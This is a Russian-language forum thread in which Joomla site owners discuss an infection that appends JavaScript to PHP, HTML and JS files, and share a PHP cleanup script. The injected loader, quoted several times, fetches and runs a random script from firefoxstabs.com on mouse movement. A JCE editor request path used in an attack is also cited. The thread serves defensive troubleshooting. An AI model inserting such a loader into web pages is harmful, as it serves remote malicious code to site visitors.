AJAX.googleapis.com - вирус или дырка Joomla? - Безопасность сайтов на Joomla

J1522 + апдейт до 23
вот такую штуку дописывает в php файлы:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>

кто сталкивался и как лечить, вернее, что искать
на хабре вот что говорят http://habrahabr.ru/qa/7466/
http://forum.searchengines.ru/showthread.php?p=8945322

права на файлы 644
фтп пароль был сменен и нигде не хранился

вообще стало появляться после прописи гугловского скрипта аналистика в шаблоне
но это может быть просто совпадение
есть идеи?

Точно в .php на сервере? Или при просмотре кода страницы в бравзере это видно?
Судя по виду, это код аналитики Google.

Ну правильно по ссылкам говорят, если дописано во все файлы, значит вирь. Разок ловил что-то подобное, вирь на компе считывал сохраненные в тотал коммандере ftp-пароли и отправлял куда следует. После этого перестал сохранять там пароли.
Если только в браузере, то могут и плагины браузера что-то дописывать

тоже думал, что Google выеживается
у аналитики вроде другой код, подобный вроде как у гуглмап

на "своей" практике - j1509 прописал во все (практически) index, menu и т.д.   
на j1522 (23) в index шаблона и в \libraries\joomla\html\html\menu.php

возможно еще куда-то, все не просматривал

изначально прописывался внизу кода и выдавал ошибку типа парсер еррор и файл строка ##
"лечил" тупо заменой
затем выловил его в коде шаблона выше футера - ошибок не выдавал, но кроме него там сидел еще див внутри которого была ссыла на левый сайт
причем ссыла была только в генерированном коде странице,
<div style="display: none;"><a href="http://www.relady.ru/">Fashion</a></div><script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">

в самом index.php шаблона был только скрипт

по ссылам почитай, там такое ловят и на Wordpressе и т.д., не только на joomla

трабла в том что если это троян, то пока не найду кого "ловить" - никто не знает вроде, я не нашел по крайней мере

Ну... Я могу одно посоветовать. Поставить с нуля копию Joomla на локалке, те же самые расширения, и сравнить все файлы дабы уличить заражённые в продажности и узреть лишние.
Возможно вредоносный код каким-то образом в БД попал, оттуда что-то его исполняет. Тогда не знаю даже, что делать.

дубликат есть, сначала же локально делалось
оттуда кста и восстанавливал

вот народ наваял скриптик:

"
<?php
define ('BR', "<br />\r\n");
$srch='<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(\'http://firefoxstabs.com/\' + Math.random().toString().substring(3) + \'.js\', function() {flag = 2;});}});});</script>';

function clean_file($file){
global $srch;
    $basename=basename($file);
    $filename=substr($basename, 0, strrpos($basename, '.'));
    if ($filename=='index' or $filename=='header' or $filename=='top' or $filename=='menu' or $filename=='footer' or $filename=='default') {
        $f_in=file_get_contents($file);
        if (strpos($f_in, $srch)!=false) {
            print($file.BR);
            $f_in=str_replace($srch, '', $f_in);
            file_put_contents($file, $f_in);
        }
    }
}

function firefoxtabs_remover($dir){
    if ($objs = glob($dir."/*")) {
        foreach($objs as $obj) {
            if (is_dir($obj)) firefoxtabs_remover($obj);
            else clean_file($obj);
        }
    }
}

$dir=realpath('./');
firefoxtabs_remover($dir);
?>
код ищет файлы от корня с именами
index
menu
header
top
footer
default
в них ищет вредоносный код и удаляет его"

но так как не кодер, рекомендовать его не могу, сам не тестил
вот что народ еще пишет:

"Что то после чистки скриптом у меня отваливаются bbcodes и еще не могу залогинеться. Чистил кэш на сайте и в браузере. После чистки скриптом в админке автоматом переключается на функцию сжатие js файлов принудительно.

Короче, заипал этот вирус. Уже надоело перезаливать файлы. В ручную

alextrish добавил 16.05.2011 в 05:39
Сейчас пробежался по шаблонам, короче в шаблоне в папке js во всех файлах js появилось уже такое:
Цитата:
document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});
"

у меня пока, что внешних признаков нет, после чистки
но посмотрим, что будет через день-другой

J1522 + апдейт до 23
вот такую штуку дописывает в php файлы:

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>

кто сталкивался и как лечить, вернее, что искать
на хабре вот что говорят http://habrahabr.ru/qa/7466/
http://forum.searchengines.ru/showthread.php?p=8945322

случилось такое в эти выходные - код тот же. он пишет в конец файлов Index.php index.html default.php и некоторые JS это код. Мне удалось восстановить все, но как скрипт залез не знаю. Сменил пароли - пока все ок. Хотя косяк был - пароль был сохранен на Пк, но что-то подсказывает что не в этом дело т.к. другие были и другие пароли сохранены для других сайтов, а с ними все ок.

По любому троян. касперыч тупил забил на него, щас поставил заного и нашел пару троянов на компе.

Я так думаю, что этот код не може быть самостоятельным. Он всего навсего подключает библиотеку JQuery. Должно быть что-то ещё, что использует функции библиотеки.

А, не досмотрел. Есть такое в коде.

Радион, это однозначно троян. Сталкивались с таким. У прогера комп был заражен и в FTP менеджере сохраненный пароль к сайту - вот и полезла такая прелесть во все php файлы.

вирус это

Вот только позавчера вычистил эту бяку с demo.joomlatune.com, там она появилась 100% по FTP (FTP использовался как промежуточный сервер как минимум 3 людьми, и один похоже поймал трояна). Откатили бекап, поменяли пароли и все нормально.

м-да, и я попала

сенкс за скрипт

правда пока, что все ок, после "чистки" уже пару дней

не нравится он сам себе

Вирусов:нет
Warning: copy(Z:\home\soft\www/op_index.html) [function.copy]: failed to open stream: No such file or directory in Z:\home\soft\www\alena_virus_oppo_ext.php on line 76


что значит подозрительный?

• Путь: Z:\home\soft\www/components/com_oziogallery2/assets/highslide/index.html Файл подозрительный. Размер: 3141

а что за троян то?
антивири его не ловят что ли?

сенкс за скрипт
не нравится он сам себе
Вирусов:нет
Warning: copy(Z:\home\soft\www/op_index.html) [function.copy]: failed to open stream: No such file or directory in Z:\home\soft\www\alena_virus_oppo_ext.php on line 76

а поправлю тогда ... то он переписывает зараженный на чистый op_index.html - был на сервере зпасной

я тоже поймал такой код на сайтах
причем поймал код, когда полезли ошибки
щас перезалил жумлу 1 5 23
теперь сайт начали ломать через иньекции
сломали через ком контент, когда вводили иньекцию
могли только менять материалы, больше ничего делать не получалось
но они как то картинку залили в имажес/сториес и я тут задумался, как через фтп? или просто через менеджер
да и ладно
вопрос в след, есть такая прога хранения паролей
http://keepass.info/ в ней хранить безопасно?

щас перезалил жумлу 1 5 23
теперь сайт начали ломать через иньекции
сломали через ком контент, когда вводили иньекцию

чушь, никаких инъекций на оригинальном com_content в Joomla 1.5.23 нет...

пароли лучше хранить в Бумажном блокноте!

пароли лучше хранить в Бумажном блокноте!
написанные простым карандашом!

чушь, никаких инъекций на оригинальном com_content в Joomla 1.5.23 нет...

могу скинуть логи!
они ввдили иньекции через ком_контент и через ком_файерьирд
форума у меня нет, другие расширения все легальные и нет варезных
(sh404sef, Xmap, joomleague, jcomments, apolls? gk_tabs, mad4joomla, jce) все они легальные...
так вот, читаю логи, обнаружил, что они ломали через иньекции
что смогли сделать:
смогли заменить все материалы, которые были на главной своим текстом
и с папку images/stories/ смогли закинуть свою картинку
в остальном вроде всё тихо.

Что сделал я..
сменил пароли юверов доступных к редактору
сменил имя и БД и пользователя БД и пароль на 130 битные
сменил пароли на ФТП...
Хостер, заблочил айпи адреса с которых ломали 66.249.68.27 88.85.98.202
могу скинуть логи, почитайте, убедитесь... мож я чё и не понял

пароли лучше хранить в Бумажном блокноте!
написанные простым карандашом!

Очень смешно )

изучал логи, нашел строку, где они мне картинку вставляют
испытал на своем сайте
"component/option,com_jce/cid,20/file,imgmanager/lang,ru/plugin,imgmanager/task,plugin/version,1579/"
подгружаеться реадктор )

и подскажите мне, что это такое?
http://www.football.uz/plugins/editors/jce/tiny_mce/plugins/searchreplace/editor_plugin.js?version=1579&cid=20
что выходит при этом?

изучал логи, нашел строку, где они мне картинку вставляют
испытал на своем сайте
"component/option,com_jce/cid,20/file,imgmanager/lang,ru/plugin,imgmanager/task,plugin/version,1579/"
подгружаеться реадктор )

у меня не подгружается-403 запрет дает. посмотрите права на папку

так там же написано - com_jce.
я так понимаю, что тут через функцию внешнего редактора JCE идёт взлом. следовательно, надо на сайте JCE и мониторить обновление.

так там же написано - com_jce.
я так понимаю, что тут через функцию внешнего редактора JCE идёт взлом. следовательно, надо на сайте JCE и мониторить обновление.

я как бы заметил, что там это написано ) обновил редактор, сразу стало выходить 403 )

Та же хрень, осуществлён доступ через фтп и дописан фрагмент кода.
При чём доступ осуществлялся неоднократно.
Если кому интересно - логи доступа ко всем зараженным файлам здесь